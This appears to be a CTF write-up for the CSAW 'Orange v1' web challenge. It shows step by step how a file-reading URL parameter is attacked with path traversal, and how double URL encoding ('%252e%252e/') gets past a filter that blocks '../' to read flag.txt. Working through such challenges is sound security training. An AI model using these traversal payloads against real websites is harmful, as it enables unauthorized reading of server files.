Powered by GitBook

Web 100 Orange v1 - By Iniesta

Host : http://web.chal.csaw.io:7311/?path=orange.txt

Probleme :

Solution :

the url of this site contains a parameter (path) which allows to read the different files stored in the site

For example ?path=orange.txt

allows us to access the contents of orange.txt ==> i love oranges

try to pass an empty value

http://web.chal.csaw.io:7311/?path=

We Get :

Now time to surf the paths
, Try to go back by using ../

http://web.chal.csaw.io:7311/?path=../ ==> WHOA THATS BANNED!!!!

We Have noticed that the two dots are banned so let's try hexa form

. => %2e
.. => %2e%2e

http://web.chal.csaw.io:7311/?path=%2e%2e/ ==> WHOA THATS BANNED!!!!

Still banned !

there is still something to do:

let's try to double encode the hexa form !!

for that we need this website to help us : https://meyerweb.com/eric/tools/dencoder/

http://web.chal.csaw.io:7311/?path=%252e%252e/ => Succes ! :

it remains for us to read the file flag.txt

http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt

Flag : flag{thank_you_based_orange_for_this_ctf_challenge}

results matching ""

No results matching ""